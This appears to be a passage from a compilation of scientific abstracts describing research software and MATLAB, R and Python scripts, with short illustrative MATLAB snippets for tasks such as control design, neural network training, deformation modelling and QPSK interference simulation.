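    lagMin   = floor(fs / range(2));
    lagMax   = ceil(fs / range(1));
    f0Frames = [];
    for k = 1:hop:(numel(x) - frameLen)
        frame = x(k:k+frameLen-1);
        frame = frame - mean(frame);
        r = xcorr(frame, lagMax, 'coeff');   % normalized autocorrelation
        r = r(lagMax+1:end);                 % keep lags 0..lagMax
        [pk, idx] = max(r(lagMin+1:lagMax)); % search only inside the window
        if pk > 0.5                          % crude voicing threshold
            f0Frames(end+1) = fs / (lagMin + idx - 1); %#ok<AGROW>
        end
    end
    f0 = mean(f0Frames);
end
```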
Advances in Software Tools for Pre-processing and Post-processing of Overset Grid Computations
NASA Technical Reports Server (NTRS)
Chan, William M.
2004-01-01
Recent developments in three pieces of software for performing pre-processing and post-processing work on numerical computations using overset grids are presented. The first is the OVERGRID graphical interface which provides a unified environment for the visualization, manipulation, generation and diagnostics of geometry and grids. Modules are also available for automatic boundary conditions detection, flow solver input preparation, multiple component dynamics input preparation and dynamics animation, simple solution viewing for moving components, and debris trajectory analysis input preparation. The second is a grid generation script library that enables rapid creation of grid generation scripts. A sample of recent applications will be described. The third is the OVERPLOT graphical interface for displaying and analyzing history files generated by the flow solver. Data displayed include residuals, component forces and moments, number of supersonic and reverse flow points, and various dynamics parameters.
New web technologies for astronomy
NASA Astrophysics Data System (ADS)
Sprimont, P.-G.; Ricci, D.; Nicastro, L.
2014-12-01
Thanks to the new HTML5 capabilities and the huge improvements of the JavaScript language, it is now possible to design very complex and interactive web user interfaces. On top of that, the once monolithic and file-server-oriented web servers are evolving into easily programmable server applications capable of coping with the complex interactions made possible by the new generation of browsers. We believe that the whole community of amateur and professional astronomers can benefit from the potential of these new technologies. New web interfaces can be designed to provide the user with a wide range of much more intuitive and interactive tools. Accessing astronomical data archives, scheduling, controlling and monitoring observatories, and in particular robotic telescopes, and supervising data reduction pipelines are all capabilities that can now be implemented in a JavaScript web application. In this paper we describe the Sadira package we are implementing exactly to this aim.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Staley, Martin
2017-09-20
This high-performance ray tracing library provides very fast rendering; compact code; type flexibility through C++ "generic programming" techniques; and ease of use via an application programming interface (API) that operates independently of any GUI, on-screen display, or other enclosing application. Kip supports constructive solid geometry (CSG) models based on a wide variety of built-in shapes and logical operators, and also allows for user-defined shapes and operators to be provided. Additional features include basic texturing; input/output of models using a simple human-readable file format and with full error checking and detailed diagnostics; and support for shared data parallelism. Kip is written in pure, ANSI standard C++; is entirely platform independent; and is very easy to use. As a C++ "header only" library, it requires no build system, configuration or installation scripts, wizards, non-C++ preprocessing, makefiles, shell scripts, or external libraries.
Muir, Dylan R; Kampa, Björn M
2014-01-01
Two-photon calcium imaging of neuronal responses is an increasingly accessible technology for probing population responses in cortex at single cell resolution, and with reasonable and improving temporal resolution. However, analysis of two-photon data is usually performed using ad-hoc solutions. To date, no publicly available software exists for straightforward analysis of stimulus-triggered two-photon imaging experiments. In addition, the increasing data rates of two-photon acquisition systems imply increasing cost of computing hardware required for in-memory analysis. Here we present a Matlab toolbox, FocusStack, for simple and efficient analysis of two-photon calcium imaging stacks on consumer-level hardware, with minimal memory footprint. We also present a Matlab toolbox, StimServer, for generation and sequencing of visual stimuli, designed to be triggered over a network link from a two-photon acquisition system. FocusStack is compatible out of the box with several existing two-photon acquisition systems, and is simple to adapt to arbitrary binary file formats. Analysis tools such as stack alignment for movement correction, automated cell detection and peri-stimulus time histograms are already provided, and further tools can be easily incorporated. Both packages are available as publicly-accessible source-code repositories.
Alcalá-Quintana, Rocío; García-Pérez, Miguel A
2013-12-01
Research on temporal-order perception uses temporal-order judgment (TOJ) tasks or synchrony judgment (SJ) tasks in their binary SJ2 or ternary SJ3 variants. In all cases, two stimuli are presented with some temporal delay, and observers judge the order of presentation. Arbitrary psychometric functions are typically fitted to obtain performance measures such as sensitivity or the point of subjective simultaneity, but the parameters of these functions are uninterpretable. We describe routines in MATLAB and R that fit model-based functions whose parameters are interpretable in terms of the processes underlying temporal-order and simultaneity judgments and responses. These functions arise from an independent-channels model assuming arrival latencies with exponential distributions and a trichotomous decision space. Different routines fit data separately for SJ2, SJ3, and TOJ tasks, jointly for any two tasks, or also jointly for the three tasks (for common cases in which two or even the three tasks were used with the same stimuli and participants). Additional routines provide bootstrap p-values and confidence intervals for estimated parameters. A further routine is included that obtains performance measures from the fitted functions. An R package for Windows and source code of the MATLAB and R routines are available as Supplementary Files.
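A minimal simulation sketch of the independent-channels model described above may help fix ideas: exponential arrival latencies in each channel and a ternary decision rule based on the arrival-time difference. The parameter values and variable names are illustrative assumptions, not the interface of the published MATLAB/R routines.

```matlab
% Simulate SJ3-style response proportions under an independent-channels model
% with exponentially distributed arrival latencies (illustrative parameters).
soa     = -200:25:200;     % stimulus onset asynchrony (ms): onset of stim 2 minus stim 1
mu1     = 40;  mu2 = 60;   % mean exponential latencies per channel (ms), assumed
delta   = 50;              % half-width of the "simultaneous" region (ms), assumed
nTrials = 5000;
pFirst = zeros(size(soa)); pSim = pFirst; pSecond = pFirst;
for i = 1:numel(soa)
    t1 = exprnd(mu1, nTrials, 1);            % arrival time of stimulus 1
    t2 = soa(i) + exprnd(mu2, nTrials, 1);   % arrival time of stimulus 2
    d  = t2 - t1;                            % arrival-time difference
    pFirst(i)  = mean(d >  delta);           % judged "stimulus 1 first"
    pSim(i)    = mean(abs(d) <= delta);      % judged "simultaneous"
    pSecond(i) = mean(d < -delta);           % judged "stimulus 2 first"
end
plot(soa, pFirst, soa, pSim, soa, pSecond);
xlabel('SOA (ms)'); ylabel('response proportion');
legend('first','simultaneous','second');
```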
Muir, Dylan R.; Kampa, Björn M.
2015-01-01
Two-photon calcium imaging of neuronal responses is an increasingly accessible technology for probing population responses in cortex at single cell resolution, and with reasonable and improving temporal resolution. However, analysis of two-photon data is usually performed using ad-hoc solutions. To date, no publicly available software exists for straightforward analysis of stimulus-triggered two-photon imaging experiments. In addition, the increasing data rates of two-photon acquisition systems imply increasing cost of computing hardware required for in-memory analysis. Here we present a Matlab toolbox, FocusStack, for simple and efficient analysis of two-photon calcium imaging stacks on consumer-level hardware, with minimal memory footprint. We also present a Matlab toolbox, StimServer, for generation and sequencing of visual stimuli, designed to be triggered over a network link from a two-photon acquisition system. FocusStack is compatible out of the box with several existing two-photon acquisition systems, and is simple to adapt to arbitrary binary file formats. Analysis tools such as stack alignment for movement correction, automated cell detection and peri-stimulus time histograms are already provided, and further tools can be easily incorporated. Both packages are available as publicly-accessible source-code repositories. PMID:25653614
Li, Peter; Castrillo, Juan I; Velarde, Giles; Wassink, Ingo; Soiland-Reyes, Stian; Owen, Stuart; Withers, David; Oinn, Tom; Pocock, Matthew R; Goble, Carole A; Oliver, Stephen G; Kell, Douglas B
2008-08-07
There has been a dramatic increase in the amount of quantitative data derived from the measurement of changes at different levels of biological complexity during the post-genomic era. However, there are a number of issues associated with the use of computational tools employed for the analysis of such data. For example, computational tools such as R and MATLAB require prior knowledge of their programming languages in order to implement statistical analyses on data. Combining two or more tools in an analysis may also be problematic since data may have to be manually copied and pasted between separate user interfaces for each tool. Furthermore, this transfer of data may require a reconciliation step in order for there to be interoperability between computational tools. Developments in the Taverna workflow system have enabled pipelines to be constructed and enacted for generic and ad hoc analyses of quantitative data. Here, we present an example of such a workflow involving the statistical identification of differentially-expressed genes from microarray data followed by the annotation of their relationships to cellular processes. This workflow makes use of customised maxdBrowse web services, a system that allows Taverna to query and retrieve gene expression data from the maxdLoad2 microarray database. These data are then analysed by R to identify differentially-expressed genes using the Taverna RShell processor which has been developed for invoking this tool when it has been deployed as a service using the RServe library. In addition, the workflow uses Beanshell scripts to reconcile mismatches of data between services as well as to implement a form of user interaction for selecting subsets of microarray data for analysis as part of the workflow execution. A new plugin system in the Taverna software architecture is demonstrated by the use of renderers for displaying PDF files and CSV formatted data within the Taverna workbench. Taverna can be used by data analysis experts as a generic tool for composing ad hoc analyses of quantitative data by combining the use of scripts written in the R programming language with tools exposed as services in workflows. When these workflows are shared with colleagues and the wider scientific community, they provide an approach for other scientists wanting to use tools such as R without having to learn the corresponding programming language to analyse their own data.
Li, Peter; Castrillo, Juan I; Velarde, Giles; Wassink, Ingo; Soiland-Reyes, Stian; Owen, Stuart; Withers, David; Oinn, Tom; Pocock, Matthew R; Goble, Carole A; Oliver, Stephen G; Kell, Douglas B
2008-01-01
Background There has been a dramatic increase in the amount of quantitative data derived from the measurement of changes at different levels of biological complexity during the post-genomic era. However, there are a number of issues associated with the use of computational tools employed for the analysis of such data. For example, computational tools such as R and MATLAB require prior knowledge of their programming languages in order to implement statistical analyses on data. Combining two or more tools in an analysis may also be problematic since data may have to be manually copied and pasted between separate user interfaces for each tool. Furthermore, this transfer of data may require a reconciliation step in order for there to be interoperability between computational tools. Results Developments in the Taverna workflow system have enabled pipelines to be constructed and enacted for generic and ad hoc analyses of quantitative data. Here, we present an example of such a workflow involving the statistical identification of differentially-expressed genes from microarray data followed by the annotation of their relationships to cellular processes. This workflow makes use of customised maxdBrowse web services, a system that allows Taverna to query and retrieve gene expression data from the maxdLoad2 microarray database. These data are then analysed by R to identify differentially-expressed genes using the Taverna RShell processor which has been developed for invoking this tool when it has been deployed as a service using the RServe library. In addition, the workflow uses Beanshell scripts to reconcile mismatches of data between services as well as to implement a form of user interaction for selecting subsets of microarray data for analysis as part of the workflow execution. A new plugin system in the Taverna software architecture is demonstrated by the use of renderers for displaying PDF files and CSV formatted data within the Taverna workbench. Conclusion Taverna can be used by data analysis experts as a generic tool for composing ad hoc analyses of quantitative data by combining the use of scripts written in the R programming language with tools exposed as services in workflows. When these workflows are shared with colleagues and the wider scientific community, they provide an approach for other scientists wanting to use tools such as R without having to learn the corresponding programming language to analyse their own data. PMID:18687127
Harrison, Arnell S.; Dadisman, Shawn V.; Flocks, James G.; Wiese, Dana S.; Robbins, Lisa L.
2007-01-01
In May of 2006, the U.S. Geological Survey conducted geophysical surveys offshore of Siesta Key, Florida. This report serves as an archive of unprocessed digital chirp seismic reflection data, trackline maps, navigation files, GIS information, Field Activity Collection System (FACS) logs, observer's logbook, and formal FGDC metadata. Gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Harrison, Arnell S.; Dadisman, Shawn V.; Ferina, Nick F.; Wiese, Dana S.; Flocks, James G.
2007-01-01
In June of 2006, the U.S. Geological Survey conducted a geophysical survey offshore of Isles Dernieres, Louisiana. This report serves as an archive of unprocessed digital CHIRP seismic reflection data, trackline maps, navigation files, GIS information, Field Activity Collection System (FACS) logs, observer's logbook, and formal FGDC metadata. Gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic UNIX (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
morphforge: a toolbox for simulating small networks of biologically detailed neurons in Python
Hull, Michael J.; Willshaw, David J.
2014-01-01
The broad structure of a modeling study can often be explained over a cup of coffee, but converting this high-level conceptual idea into graphs of the final simulation results may require many weeks of sitting at a computer. Although models themselves can be complex, often many mental resources are wasted working around complexities of the software ecosystem such as fighting to manage files, interfacing between tools and data formats, finding mistakes in code or working out the units of variables. morphforge is a high-level, Python toolbox for building and managing simulations of small populations of multicompartmental biophysical model neurons. An entire in silico experiment, including the definition of neuronal morphologies, channel descriptions, stimuli, visualization and analysis of results can be written within a single short Python script using high-level objects. Multiple independent simulations can be created and run from a single script, allowing parameter spaces to be investigated. Consideration has been given to the reuse of both algorithmic and parameterizable components to allow both specific and stochastic parameter variations. Some other features of the toolbox include: the automatic generation of human-readable documentation (e.g., PDF files) about a simulation; the transparent handling of different biophysical units; a novel mechanism for plotting simulation results based on a system of tags; and an architecture that supports both the use of established formats for defining channels and synapses (e.g., MODL files), and the possibility to support other libraries and standards easily. We hope that this toolbox will allow scientists to quickly build simulations of multicompartmental model neurons for research and serve as a platform for further tool development. PMID:24478690
ORIGAMI Automator Primer. Automated ORIGEN Source Terms and Spent Fuel Storage Pool Analysis
DOE Office of Scientific and Technical Information (OSTI.GOV)
Wieselquist, William A.; Thompson, Adam B.; Bowman, Stephen M.
2016-04-01
Source terms and spent nuclear fuel (SNF) storage pool decay heat load analyses for operating nuclear power plants require a large number of Oak Ridge Isotope Generation and Depletion (ORIGEN) calculations. SNF source term calculations also require a significant amount of bookkeeping to track quantities such as core and assembly operating histories, spent fuel pool (SFP) residence times, heavy metal masses, and enrichments. The ORIGEN Assembly Isotopics (ORIGAMI) module in the SCALE code system provides a simple scheme for entering these data. However, given the large scope of the analysis, extensive scripting is necessary to convert formats and process data to create thousands of ORIGAMI input files (one per assembly) and to process the results into formats readily usable by follow-on analysis tools. This primer describes a project within the SCALE Fulcrum graphical user interface (GUI) called ORIGAMI Automator that was developed to automate the scripting and bookkeeping in large-scale source term analyses. The ORIGAMI Automator enables the analyst to (1) easily create, view, and edit the reactor site and assembly information, (2) automatically create and run ORIGAMI inputs, and (3) analyze the results from ORIGAMI. ORIGAMI Automator uses the standard ORIGEN binary concentrations files produced by ORIGAMI, with concentrations available at all time points in each assembly's life. The GUI plots results such as mass, concentration, activity, and decay heat using a powerful new ORIGEN Post-Processing Utility for SCALE (OPUS) GUI component. This document includes a description and user guide for the GUI, a step-by-step tutorial for a simplified scenario, and appendices that document the file structures used.
AgdbNet – antigen sequence database software for bacterial typing
Jolley, Keith A; Maiden, Martin CJ
2006-01-01
Background Bacterial typing schemes based on the sequences of genes encoding surface antigens require databases that provide a uniform, curated, and widely accepted nomenclature of the variants identified. Due to the differences in typing schemes, imposed by the diversity of genes targeted, creating these databases has typically required the writing of one-off code to link the database to a web interface. Here we describe agdbNet, widely applicable web database software that facilitates simultaneous BLAST querying of multiple loci using either nucleotide or peptide sequences. Results Databases are described by XML files that are parsed by a Perl CGI script. Each database can have any number of loci, which may be defined by nucleotide and/or peptide sequences. The software is currently in use on at least five public databases for the typing of Neisseria meningitidis, Campylobacter jejuni and Streptococcus equi and can be set up to query internal isolate tables or suitably-configured external isolate databases, such as those used for multilocus sequence typing. The style of the resulting website can be fully configured by modifying stylesheets and through the use of customised header and footer files that surround the output of the script. Conclusion The software provides a rapid means of setting up customised Internet antigen sequence databases. The flexible configuration options enable typing schemes with differing requirements to be accommodated. PMID:16790057
A System Analysis Approach to Robot Gripper Control Using Phase Lag Compensator Bode Designs
NASA Astrophysics Data System (ADS)
Aye, Khin Muyar; Lin, Htin; Tun, Hla Myo
2008-10-01
In this paper, we present result comparisons for phase-lag compensator designs developed using Bode plots. The implementation of classical experiments as MATLAB m-files is described. A robot gripper control system can be designed to gain insight into a variety of concepts, including stabilization of unstable systems, compensation properties, and Bode analysis and design. The analysis has resulted in a number of important conclusions for the design of a new generation of control support systems.
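As a sketch of the kind of design exercise the paper describes, the following MATLAB fragment compares open-loop Bode plots before and after adding a phase-lag compensator; the plant transfer function and compensator constants are assumed for illustration and are not the gripper model from the paper (Control System Toolbox functions tf, bode, and margin are used).

```matlab
% Compare open-loop Bode plots with and without a phase-lag compensator.
s    = tf('s');
G    = 4 / (s*(s + 2));            % hypothetical plant, not the paper's gripper model
beta = 10;  T = 10;                % lag compensator constants, assumed
C    = (T*s + 1) / (beta*T*s + 1); % phase-lag compensator: dc gain 1, HF gain 1/beta
figure; bode(G, 'b', C*G, 'r--'); grid on
legend('uncompensated', 'lag-compensated');
[~, Pm1] = margin(G);              % phase margin before compensation
[~, Pm2] = margin(C*G);            % phase margin after compensation
fprintf('Phase margin: %.1f deg -> %.1f deg\n', Pm1, Pm2);
```

Lowering the gain crossover frequency with the lag element is what buys the additional phase margin here, which is the basic trade-off such a design illustrates.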
2010-06-01
For the output layer, the sensitivity in element form is $s_i^M = -2\,\dot{f}^M(n_i^M)\,(t_i - a_i)$, which can be expressed in matrix form as $\mathbf{s}^M = -2\,\dot{\mathbf{F}}^M(\mathbf{n}^M)(\mathbf{t} - \mathbf{a})$. Propagate the sensitivities backward through the network: $\mathbf{s}^m = \dot{\mathbf{F}}^m(\mathbf{n}^m)\,(\mathbf{W}^{m+1})^T\,\mathbf{s}^{m+1}$, for $m = M-1, \ldots, 2, 1$. 3. Weights and biases ... A: MATLAB M-Files
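A minimal MATLAB sketch of the sensitivity recursion above, for a two-layer network with a tanh hidden layer and a linear output layer, is given below; the toy data, layer sizes, and learning rate are assumptions, and the code is a generic illustration rather than the thesis's M-files.

```matlab
% Stochastic gradient descent with back-propagated sensitivities
% s^M = -2*F'^M(n^M)*(t - a) and s^m = F'^m(n^m)*(W^{m+1})'*s^{m+1}.
rng(0);
p = linspace(-1, 1, 21);  t = sin(pi*p);    % toy training set (assumed)
S1 = 5;                                     % hidden-layer size
W1 = randn(S1,1); b1 = randn(S1,1);         % layer 1 weights and biases
W2 = randn(1,S1); b2 = randn;               % layer 2 weights and bias
alpha = 0.05;                               % learning rate
for epoch = 1:2000
    for k = 1:numel(p)
        % forward pass
        n1 = W1*p(k) + b1;   a1 = tanh(n1);
        n2 = W2*a1 + b2;     a2 = n2;       % linear output layer
        % backward pass: output sensitivity, then hidden-layer sensitivity
        s2 = -2 * (t(k) - a2);              % F'^2 = 1 for the linear layer
        s1 = (1 - a1.^2) .* (W2' * s2);     % F'^1 = diag(1 - a1.^2) for tanh
        % weight and bias updates
        W2 = W2 - alpha * s2 * a1';   b2 = b2 - alpha * s2;
        W1 = W1 - alpha * s1 * p(k);  b1 = b1 - alpha * s1;
    end
end
```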
2006-09-01
spiral development cycle involved transporting the software processes from a Windows XP / MATLAB environment to a Linux / C++ environment. This ... tested on. Additionally, in the case of the GUMSTIX PC boards, the LINUX operating system is burned into the read-only memory. Lastly, both PC-104 and ... both the real-time environment and the post-processed environment. When the system operates in real-time mode, an output file is generated which
Lowering the Barrier to Reproducible Research by Publishing Provenance from Common Analytical Tools
NASA Astrophysics Data System (ADS)
Jones, M. B.; Slaughter, P.; Walker, L.; Jones, C. S.; Missier, P.; Ludäscher, B.; Cao, Y.; McPhillips, T.; Schildhauer, M.
2015-12-01
Scientific provenance describes the authenticity, origin, and processing history of research products and promotes scientific transparency by detailing the steps in computational workflows that produce derived products. These products include papers, findings, input data, software products to perform computations, and derived data and visualizations. The geosciences community values this type of information, and, at least theoretically, strives to base conclusions on computationally replicable findings. In practice, capturing detailed provenance is laborious and thus has been a low priority; beyond a lab notebook describing methods and results, few researchers capture and preserve detailed records of scientific provenance. We have built tools for capturing and publishing provenance that integrate into analytical environments that are in widespread use by geoscientists (R and Matlab). These tools lower the barrier to provenance generation by automating capture of critical information as researchers prepare data for analysis, develop, test, and execute models, and create visualizations. The 'recordr' library in R and the `matlab-dataone` library in Matlab provide shared functions to capture provenance with minimal changes to normal working procedures. Researchers can capture both scripted and interactive sessions, tag and manage these executions as they iterate over analyses, and then prune and publish provenance metadata and derived products to the DataONE federation of archival repositories. Provenance traces conform to the ProvONE model extension of W3C PROV, enabling interoperability across tools and languages. The capture system supports fine-grained versioning of science products and provenance traces. By assigning global identifiers such as DOIs, researchers can cite the computational processes used to reach findings. And, finally, DataONE has built a web portal to search, browse, and clearly display provenance relationships between input data, the software used to execute analyses and models, and derived data and products that arise from these computations. This provenance is vital to interpretation and understanding of science, and provides an audit trail that researchers can use to understand and replicate computational workflows in the geosciences.
NASA Technical Reports Server (NTRS)
Elrod, David; Christensen, Eric; Brown, Andrew
2011-01-01
The temporal frequency content of the dynamic pressure predicted by a 360 degree computational fluid dynamics (CFD) analysis of a turbine flow field provides indicators of forcing function excitation frequencies (e.g., multiples of blade pass frequency) for turbine components. For the Pratt and Whitney Rocketdyne J-2X engine turbopumps, Campbell diagrams generated using these forcing function frequencies and the results of NASTRAN modal analyses show a number of components with modes in the engine operating range. As a consequence, forced response and static analyses are required for the prediction of combined stress, high cycle fatigue safety factors (HCFSF). Cyclically symmetric structural models have been used to analyze turbine vane and blade rows, not only in modal analyses, but also in forced response and static analyses. Due to the tortuous flow pattern in the turbine, dynamic pressure loading is not cyclically symmetric. Furthermore, CFD analyses predict dynamic pressure waves caused by adjacent and non-adjacent blade/vane rows upstream and downstream of the row analyzed. A MATLAB script has been written to calculate displacements due to the complex cyclically asymmetric dynamic pressure components predicted by CFD analysis, for all grids in a blade/vane row, at a chosen turbopump running speed. The MATLAB displacements are then read into NASTRAN, and dynamic stresses are calculated, including an adjustment for possible mistuning. In a cyclically symmetric NASTRAN static analysis, static stresses due to centrifugal, thermal, and pressure loading at the mode running speed are calculated. MATLAB is used to generate the HCFSF at each grid in the blade/vane row. When compared to an approach assuming cyclic symmetry in the dynamic flow field, the current approach provides better assurance that the worst case safety factor has been identified. An extended example for a J-2X turbopump component is provided.
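For context, one common way to combine a static (mean) stress with an alternating stress into a high cycle fatigue safety factor is the modified Goodman relation; the sketch below uses illustrative material properties and stress values, and is not claimed to be the specific HCFSF formulation used in the J-2X analyses.

```matlab
% Modified-Goodman combination of static (mean) and dynamic (alternating)
% stresses into an HCF safety factor at each grid point (illustrative values).
sigma_e    = 300e6;                       % endurance limit, Pa (assumed)
sigma_u    = 900e6;                       % ultimate strength, Pa (assumed)
sigma_mean = 1e6 * [120; 250; 310];       % static stress per grid, from a static solution
sigma_alt  = 1e6 * [ 40;  95; 160];       % alternating stress per grid, from forced response
% 1/SF = sigma_alt/sigma_e + sigma_mean/sigma_u
HCFSF = 1 ./ (sigma_alt./sigma_e + sigma_mean./sigma_u);
[minSF, worstGrid] = min(HCFSF);          % worst-case grid point
fprintf('Minimum HCFSF = %.2f at grid %d\n', minSF, worstGrid);
```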
EAGLE: 'EAGLE'Is an' Algorithmic Graph Library for Exploration
DOE Office of Scientific and Technical Information (OSTI.GOV)
2015-01-16
The Resource Description Framework (RDF) and SPARQL Protocol and RDF Query Language (SPARQL) were introduced about a decade ago to enable flexible schema-free data interchange on the Semantic Web. Today data scientists use the framework as a scalable graph representation for integrating, querying, exploring and analyzing data sets hosted at different sources. With increasing adoption, the need for graph mining capabilities for the Semantic Web has emerged. Today there are no tools to conduct "graph mining" on RDF standard data sets. We address that need through implementation of popular iterative graph mining algorithms (triangle count, connected component analysis, degree distribution, diversity degree, PageRank, etc.). We implement these algorithms as SPARQL queries, wrapped within Python scripts, and call our software tool EAGLE. In RDF style, EAGLE stands for "EAGLE 'Is an' algorithmic graph library for exploration." EAGLE is like 'MATLAB' for 'Linked Data.'
Shi, Handuo; Colavin, Alexandre; Lee, Timothy K; Huang, Kerwyn Casey
2017-02-01
Single-cell microscopy is a powerful tool for studying gene functions using strain libraries, but it suffers from throughput limitations. Here we describe the Strain Library Imaging Protocol (SLIP), which is a high-throughput, automated microscopy workflow for large strain collections that requires minimal user involvement. SLIP involves transferring arrayed bacterial cultures from multiwell plates onto large agar pads using inexpensive replicator pins and automatically imaging the resulting single cells. The acquired images are subsequently reviewed and analyzed by custom MATLAB scripts that segment single-cell contours and extract quantitative metrics. SLIP yields rich data sets on cell morphology and gene expression that illustrate the function of certain genes and the connections among strains in a library. For a library arrayed on 96-well plates, image acquisition can be completed within 4 min per plate.
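The flavor of the image analysis step can be sketched in a few lines of MATLAB using Image Processing Toolbox functions; the file name, the assumption that cells are darker than the background, and the area threshold are illustrative, and this is not the SLIP code itself.

```matlab
% Threshold an image, label candidate single-cell regions, and extract
% simple morphology metrics (illustrative, not the SLIP scripts).
img = imread('plate01_well_A1.png');            % hypothetical image file
if size(img, 3) == 3, img = rgb2gray(img); end
bw  = imbinarize(imcomplement(img));            % assumes cells darker than background
bw  = bwareaopen(bw, 50);                       % drop objects smaller than 50 pixels
stats   = regionprops(bw, 'Area', 'MajorAxisLength', 'MinorAxisLength');
lengths = [stats.MajorAxisLength];
widths  = [stats.MinorAxisLength];
fprintf('%d cells, mean length %.1f px, mean width %.1f px\n', ...
        numel(stats), mean(lengths), mean(widths));
```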
Battaglia, Maurizio; Cervelli, Peter F.; Murray, Jessica R.
2013-01-01
This manual provides the physical and mathematical concepts for selected models used to interpret deformation measurements near active faults and volcanic centers. The emphasis is on analytical models of deformation that can be compared with data from Global Positioning System (GPS) receivers, interferometric synthetic aperture radar (InSAR), leveling surveys, tiltmeters and strainmeters. Source models include pressurized spherical, ellipsoidal, and horizontal penny-shaped geometries in an elastic, homogeneous, flat half-space. Vertical dikes and faults are described following the mathematical notation for rectangular dislocations in an elastic, homogeneous, flat half-space. All the analytical expressions were verified against numerical models developed with COMSOL Multiphysics, a finite element analysis software package (http://www.comsol.com). In this way, typographical errors were identified and corrected. MATLAB scripts are also provided to facilitate the application of these models.
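As an example of the class of analytical sources covered by the manual, a Mogi-type point pressure source in an elastic half-space has a closed-form surface displacement field; the MATLAB sketch below uses assumed source parameters and is a textbook illustration, not the manual's own scripts.

```matlab
% Surface displacements of a pressurized spherical (Mogi-type) point source
% in an elastic half-space (illustrative parameters).
nu = 0.25;                          % Poisson's ratio
mu = 30e9;                          % shear modulus, Pa
a  = 500;                           % source radius, m (assumed)
dP = 10e6;                          % pressure change, Pa (assumed)
d  = 3000;                          % source depth, m (assumed)
r  = linspace(0, 10e3, 200);        % radial distance from the source axis, m
R3 = (r.^2 + d^2).^(3/2);
C  = (1 - nu) * dP * a^3 / mu;      % source strength
uz = C * d ./ R3;                   % vertical (uplift) displacement
ur = C * r ./ R3;                   % radial displacement
plot(r/1e3, uz*1e3, r/1e3, ur*1e3);
xlabel('distance (km)'); ylabel('displacement (mm)'); legend('u_z', 'u_r');
```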
An Efficient, Noniterative Method of Identifying the Cost-Effectiveness Frontier.
Suen, Sze-chuan; Goldhaber-Fiebert, Jeremy D
2016-01-01
Cost-effectiveness analysis aims to identify treatments and policies that maximize benefits subject to resource constraints. However, the conventional process of identifying the efficient frontier (i.e., the set of potentially cost-effective options) can be algorithmically inefficient, especially when considering a policy problem with many alternative options or when performing an extensive suite of sensitivity analyses for which the efficient frontier must be found for each. Here, we describe an alternative one-pass algorithm that is conceptually simple, easier to implement, and potentially faster for situations that challenge the conventional approach. Our algorithm accomplishes this by exploiting the relationship between the net monetary benefit and the cost-effectiveness plane. To facilitate further evaluation and use of this approach, we also provide scripts in R and Matlab that implement our method and can be used to identify efficient frontiers for any decision problem. © The Author(s) 2015.
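The relationship the authors exploit can be illustrated with a simple net-monetary-benefit sweep in MATLAB: a strategy lies on the frontier if it maximizes NMB at some willingness-to-pay. The sketch below is a brute-force illustration of that relationship with made-up costs and effects, not the authors' one-pass algorithm, and a finite grid only approximates the full frontier.

```matlab
% Identify frontier strategies as those that maximize net monetary benefit
% (NMB) for at least one willingness-to-pay value (illustrative data).
cost = [1000;  4000;  6500;  9000];     % hypothetical strategy costs
qaly = [ 2.0;   2.6;   2.7;   3.1];     % hypothetical effectiveness (QALYs)
wtp  = linspace(0, 2e5, 2001);          % willingness-to-pay grid ($/QALY)
onFrontier = false(size(cost));
for i = 1:numel(wtp)
    nmb = wtp(i) .* qaly - cost;        % NMB of each strategy at this threshold
    [~, best] = max(nmb);
    onFrontier(best) = true;            % ever-optimal strategies are efficient
end
disp(find(onFrontier)');                % indices of the non-dominated strategies
```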
An Efficient, Non-iterative Method of Identifying the Cost-Effectiveness Frontier
Suen, Sze-chuan; Goldhaber-Fiebert, Jeremy D.
2015-01-01
Cost-effectiveness analysis aims to identify treatments and policies that maximize benefits subject to resource constraints. However, the conventional process of identifying the efficient frontier (i.e., the set of potentially cost-effective options) can be algorithmically inefficient, especially when considering a policy problem with many alternative options or when performing an extensive suite of sensitivity analyses for which the efficient frontier must be found for each. Here, we describe an alternative one-pass algorithm that is conceptually simple, easier to implement, and potentially faster for situations that challenge the conventional approach. Our algorithm accomplishes this by exploiting the relationship between the net monetary benefit and the cost-effectiveness plane. To facilitate further evaluation and use of this approach, we additionally provide scripts in R and Matlab that implement our method and can be used to identify efficient frontiers for any decision problem. PMID:25926282
Analysis of interference of QPSK and QDPSK modulation signals by mathematical
NASA Astrophysics Data System (ADS)
Li, Dairuo; Xu, Kai
2017-03-01
In today's society, with the rapid development and extensive application of networked information technology and integrated information systems, information plays an important role in military communication, and mastery of information confers a decisive advantage. How to protect one's own security, obtain and transmit information smoothly, and eliminate interference to the greatest extent possible has become an important issue at home and abroad. QPSK modulation and its improved variants are among the most widely used mainstream signal modulations. In this paper, the principles of QPSK and QDPSK modulation and demodulation are introduced. Then, how to interfere with a QPSK-modulated signal is analyzed, and the interference of the QPSK-modulated signal is simulated with a MATLAB script; these results provide the basis and preparatory work for the subsequent study of anti-jamming measures.
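A minimal MATLAB sketch of the kind of simulation described, QPSK over an additive white Gaussian noise channel with a single-tone interferer, is given below; the symbol count, Eb/N0, interferer frequency, and interference-to-signal ratios are assumptions for illustration and not the paper's settings.

```matlab
% QPSK bit error rate versus interference-to-signal ratio (ISR) in AWGN
% with a single-tone interferer (illustrative parameters).
rng(1);
nSym = 1e5;
bits = randi([0 1], 2, nSym);
sym  = (1/sqrt(2)) * ((2*bits(1,:) - 1) + 1j*(2*bits(2,:) - 1));  % Gray-mapped QPSK, Es = 1
EbN0dB = 8;                                  % assumed
N0   = 0.5 * 10^(-EbN0dB/10);                % Eb = Es/2 = 0.5
isrdB = -20:5:10;                            % interference-to-signal ratio, dB
ber = zeros(size(isrdB));
for k = 1:numel(isrdB)
    interf = sqrt(10^(isrdB(k)/10)) * exp(1j*(2*pi*0.013*(1:nSym) + 2*pi*rand));
    noise  = sqrt(N0/2) * (randn(1, nSym) + 1j*randn(1, nSym));
    r      = sym + interf + noise;
    bhat   = [real(r) > 0; imag(r) > 0];     % decide each quadrature bit by sign
    ber(k) = mean(bits(:) ~= bhat(:));
end
semilogy(isrdB, ber, '-o'); grid on
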